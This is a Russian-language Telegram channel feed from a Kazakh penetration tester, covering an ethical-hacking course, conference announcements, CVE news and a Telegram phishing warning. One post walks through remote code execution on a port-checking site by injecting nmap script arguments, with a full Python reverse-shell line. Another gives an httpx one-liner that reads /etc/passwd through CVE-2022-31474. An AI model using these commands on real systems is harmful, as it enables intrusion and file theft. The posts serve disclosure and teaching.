One brick to the IT world
474 subscribers
25 photos
5 videos
2 files
78 links
Download Telegram
Долго думал, выкладывать тут или нет, и решился. Некоторое время назад преподавал студентам Astana IT University курс по этичному хакингу, а так как студентов было много, лекции были записаны в формате видео. Упор был сделан на возможность просмотра лекций для всех, т.е. не только для студентов, и планировалось, что по окончанию курса слушатели будут на уровне junior penetration tester.

Формат: 10% теория / 90% практика

Курс содержит 10 тем и связанные с ними домашние задания:
Неделя 1. Введение в коммерческий пентест. Создание рабочей среды
Неделя 2. Сбор информации. OSINT
Неделя 3. Техники социальной инженерии
Неделя 4. Безопасность web-приложений
Неделя 5. Атака на web-приложения. Автоматические инструменты
Неделя 6. Безопасность инфраструктуры. Разведка
Неделя 7. Атаки на инфраструктуру. Metasploit Framework
Неделя 8. Основы Android приложений и атаки на WiFi
Неделя 9. Платформы для обучения кибербезопасности
Неделя 10. Написание коммерческого отчета

Playlist на Youtube:
https://www.youtube.com/watch?v=oRflkcjm08U&list=PLsucn_wbSMY33VfVd1zSkwnNZQwqJminO

P.S. Так как я не диктор, возможно придется поставить скорость на 1.5 :)

@onebrick
This media is not supported in your browser
VIEW IN TELEGRAM
Взлом системы безопасности стрекозы

#nature #reallifepentest

@onebrick
Forwarded from b4tr_ch
Парень с Казахстана написал книгу по Malware Development. У Жасулана сейчас не простая ситуация, связанная с болезнью дочери и он через книгу собирает деньги на ее лечение.

Книга на английском языке. Возможно будет полезна и давайте поддержим парня. Электронная книга, стоимость всего 16 долларов.
У Жасулана так же есть Каспи: +77087235263 для тех кто просто хочет поддержать парня.
Очень давно был интересный кейс с сайтом для системных администраторов, где можно было проверить открыт ли порт сайта. Первое, что пришло голову, это вписать в IP:
127.0.0.1 -h
В результате сайт вернул мануал nmap-a. Но многие символы фильтровались и выйти за переделы команды nmap-а не удалось. После этого, путем проб и ошибок, был найден интересный вектор remote code execution.

В составе nmap есть модуль http-fetch, который умеет ходить по URL и скачивать файлы. Более того, можно даже указать куда сохранить файл. Немного покурив, как работают скрипты nmap, было обнаружено, что через функцию os.execute() можно выполнять команды.

0) На своем сервере открываем порт 8888:
nc -lvp 8888
Допустим IP вашего сервера 1.1.1.1

1) Создаем у себя на сервере файл index.php с содержимым:
os.execute("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.1\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")

2) Запускаем встроенный сервер php:
php -S 0.0.0.0:8080

3) На атакуемом сайте вместо IP пишем:
1.1.1.1 -script http-fetch
Вместо порта:
8080 -dd -script-args destination=/tmp

Т.е. на бэкенде сайта команда преобразуется в что-то типа:
nmap 1.1.1.1 -script http-fetch -p 8080  -dd -script-args destination=/tmp

В результате выполнения этой команды, по пути /tmp/1.1.1.1/8080/index.html будет лежат скрипт с первого шага.

4) Запускаем скачанный скрипт, вписав вместо порта:
8080 -dd -script /tmp/1.1.1.1/8080/index.html 
и получаем бэкконнект.

Таким образом, иногда необязательно выходить за рамки команды, вписывая такие символы, как | & ;.

Вот такой вот зиродей😁

#case #nmap #research #rce
Пишут, что заразили 35к репозиториев. Вредоносный код крадет все конфиги и выполняет произвольные команды.

Рекомендую поискать в коде (включая все библиотеки, в т.ч. node_modules и т.д.) домен

ovz1.j19544519.pr46m.vps.myjino.ru

Если он есть, откатывайтесь, меняйте все пароли и ключи.

Источник:
https://mobile.twitter.com/stephenlacy/status/1554697077430505473

#infected
Forwarded from Sys-Admin InfoSec
Open SysConf 2022 Уже в Октябре!
 
Привет, мы готовим новую - четвертую ежегодную встречу Open SysConf'22.

Уже точно есть:
— Три доклада
— Собрано половина бюджета
— Место, дата и время встречи
- Обновленный сайт sysconf.io

Обычно у большинства людей обстоятельства складываются таким образом, что вечно что-то мешает заняться спортом, сделать доклад, поучаствовать в конфе, мешают обычно работа, откладывание за завтра и тп и тд...

Собраться, поделиться знаниями, найти время для себя - это то, что нужно действительно сделать здесь и сейчас (и в Октябре)! Расправь плечи дорогой друг, подними голову и ступай смело вперед:

- https://sysconf.io
- 14 Октября, с 11:00 до 20:00, Алматы.

Зал большой, места хватит всем! Все нужные ссылки, ты найдешь на сайте. Peace ✌️.
 
Список всех (известных) зиродеев, которые были активно использованы хакерами с 2014 года:
https://docs.google.com/spreadsheets/u/0/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/htmlview

Так, например, за последние два дня было пропатчено 3 зиродея:
* CVE-2022-2856 позволяющий выполнить код в Google Chrome
* CVE-2022-32893 позволяющий выполнить код в Safari
* CVE-2022-32894 позволяющий выполнить код в iOS/macOS kernel

Обновляемся, если еще не успели.

Источник: @ckuRED

#zeroday
Обнаружил SSRF-уязвимость в плагине Tumbler для XFCE, которая работает по умолчанию. Если кратко, суть в том, что при открытии директории с m3u8-файлом с расширением .mp4 (работает и для .mp3, .avi, .mpg, etc.) можно отправлять любой GET-запрос на любой сервер.

Работает в последней версии Kali Linux, Debian XFCE, и скорее всего в любом другом дистрибутиве Linux с XFCE на борту. Но большую опасность, наверное, несет для Kali Linux, пользователи которого локально тестируют уязвимые приложения типа DVWA, и одного запроса может хватить для компрометации компьютера.

Патч и исправленная версия уже выпущены.

Подробности на моем блоге:
https://murat.one/?p=187

#ssrf #xfce #kali #debian
Forwarded from Sys-Admin InfoSec
Open SysConf 2022 - Updates: Анонс доклада
 
Привет, последний день лета не означает, что все летнее, праздничное - уходит до следующего года, скоро наступит 14 Октября и мы снова окунемся в теплую и дружественную обстановку Open SysConf'22.

Готовы стикеры, пару подарков и конечно несколько тем докладов, один из которых хочу презентовать вам:

— Автор: @novitoll - автор deep dive ресерчей, патчер ядра Linux и конечно же автор множества различных статей и докладов, имеет свой канал https://teleg.eu/novitoll_ch и всегда старается шарить полезную инфу людям, в том числе и на Open SysConf'ах

— Доклад: Практический опыт с 4G, 5G
— Кратко о докладе: Кодим Rx, Tx функционалы на С, описывая теорию (OFDM/SC-OFDM демодуляция, логические и транспорт каналы 4G, 5G) и подводные камни при имплементации. Анализируем трафик.)

Скажу от себя, все технические детали, а их будет очень много будут представлены в доступном и демонстрируемом виде.

В общем дорогой друг, не теряйся:
- https://sysconf.io
- 14 Октября, с 11:00 до 20:00, Алматы
- И просто для галочки, не в службу, а в дружбу, как посетитель зачекинься в этой форме.

Всем добра. Peace ✌️.
 
Forwarded from Devious Methods
В TryHackMe появился модуль Host Evasions!

This module provides the essential knowledge and fundamental techniques to bypass various host-based security solutions, including AV products, UAC and AppLocker, Logging, Runtime Detection, and AMSI. You will also learn the Living-Off-the-Land technique and how to leverage the Windows Sysinternals tool to perform various Red Team purposes

https://tryhackme.com/module/host-evasions
Ожидается интересный доклад про нейромаркетинг от Евгения Гончарова, приходите :)
Forwarded from Sys-Admin InfoSec
Hey all, tmrw I will speak at the KazHackStan conference with my presentation with subject:

* Open-Source Projects Responsibility Awareness (by Open BLD Example)

All details you can see on KazHackStan.kz, let's burn 🔥 tomorrow, who will be in Almaty let's get acquainted and let's talk, try to share knowledge with each other 🤘
Forwarded from BugXplorer
CVE-2022-31474
https://twitter.com/shaybt12/status/1569794789175967745

cat hosts |httpx -title -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-
id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"

#bugbountytips
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - SSRF-уязвимости / Старый... Но не бесполезный IRC
 
Привет, мы идем вперед согласно своей правде и намерениям обнаруживая уязвимости и сигнализируя алертами об аномалиях в наших (и не только) системах.

Детали двух новых докладов на 14 Октября

История одного CVE
- Автор: @manfromkz. Senior Security Testing Engineer | OSCP | eWPTXv2 | eCPTXv2 | Master of Computer Sciencer
- Краткое описание: Рассказ о том, как простой пентест веб-приложения привел к выявлению SSRF-уязвимости в популярном менеджере рабочего стола для Linux.

Старый... Но не бесполезный
- Автор: @t2micro. DevOps
- Краткое описание: Применение протокола IRC в современной инфраструктуре для построения сервис-ориентированной модели алертинга.

От себя: Мурат и Ильяс мои хорошие друзья и экстра-профессионалы своего дела. Детали вышеприведенных докладов, которые будут представлены на Open SysConf'22 - это уникальный материал от первого лица, возможность не только послушать, но и задать вопросы, пообщаться в неформальной обстановке, обменяться опытом и знаниями простым и понятным форматом.

Перед зимней спячкой ув <username> обязательно приходи 14 Октября в SmartPoint г.Алматы, трансляции не будет, но будет возможность пообщаться в живую. Детали здесь - sysconf.io

Peace ✌️
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - Сети, Ansible шаблонизация и не только
 
До нашей встречи на Open SysConf в г.Алматы осталось практически 10 дней и я рад презентовать Вам финальные темы докладов:

Сети (хуети) в современном датацентре
- Автор: Айдар Оспанбеков. Архитектор облака PS.kz.
- Краткое описание: С какими проблемами мы столкнулись при эксплуатации сети в публичном облаке; Как и для чего мы отказывались от VLAN в пользу VxLAN; Как строили сеть по топологии spine-leaf с BGP и FRRouting

Шаблонизация Linux систем в организациях
- Автор: Нурбиби "R0b0Cat". Системный администратор.
- Краткое описание: Доклад для тех кому нужно произвести в единый формат linux дистрибутивы в организации

Неявный превентинг констракшн
- Автор: Yevgeniy "sysadminkz". Sys-Adm.in
- Краткое описание: Неявный превентинг - такого термина в интернете не нашел, поэтому расскажу о том, как я вижу defencive подход с позиции неявной превентивной защиты. Создадим новый термин и его понимание прямо в реалтайме ✌️

Голова чтобы думать, ноги чтобы ходить - приходи на Open SysConf 14 октября в SmartPoint, г.Алматы.

Детали на сайте: https://sysconf.io
 
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - Анонс всех докладов на завтра (14 Октября)
 
До дня Х осталось меньше суток, завтра по плану будет:

— 11:00 - Вступительное слово
— 11:15 - Сабыржан "novitoll" Тасболатов: Практический опыт с 4G, 5G
— 12:15 - Нурбиби "R0b0Cat": Шаблонизация Linux систем в организациях
— 13:00 - Обед
— 14:00 - Дмитрий "ватман": CDC
— 14:50 - Kutlymurat "manfromkz" Mambetniyazov: История одного CVE
— 15:20 - Roman "sysroman": Ansible AWX by Oracle
— 15:45 - кофе-брейк
— 16:00 - Shelldon "Sh3lldon": DEP vs ROP
— 16:50 - Ilyas B Arinov "t2micro": Старый... Но не бесполезный IRC
— 17:20 - Айдар Оспанбеков: Сети (хуети) в современном датацентре
— 18:05 - Yevgeniy "sysadminkz": Неявный превентинг констракшн

План может меняться, уже не обессудьте. Заряжаем себя и друзей, находим силы и возможности и проводим нашу встречу в добром здравии и отношении.

☀️ Завтра встречаем Вас на первом этаже - ул. Байзакова 280 в SmartPoint, г.Алматы
⚡️ Кто не зарегистрировался, зарегистрируйтесь пожалуйста иначе мест Вам может не хватить, детали здесь: https://sysconf.io

Всем Peace ✌️
 
История_одного_CVE_@manfromkz_Open_SysConf'22.pdf
1.5 MB
Мой доклад на тему "История одного CVE или как взломать хакера на Kali Linux" на Open Sysconf'22.

Запись доклада выложу позже.
Forwarded from b4tr
Всем у кого не стоит двухфакторка в телеге посвящается. Сейчас идут массовые взломы пользователей телегам через различного рода ботов у которых один и тот же функционал. В общем, Вам приходит сообщение с рекламой некоего бота, этот бот просит пройти верификацию, после того как вы отправили боту свой номер телефона, вам приходит сообщение с кодом, и бот просит вас ввести ему этот код, после чего всем вашим контактам и всем группам где вы состоите приходит то же самое сообщение с рекламой, что позволяет какеру пополнять свою базу сдеаноненных пользователей.
ВЫВОД. Ставьте двухфакторку!
How to Save Live Photo as Video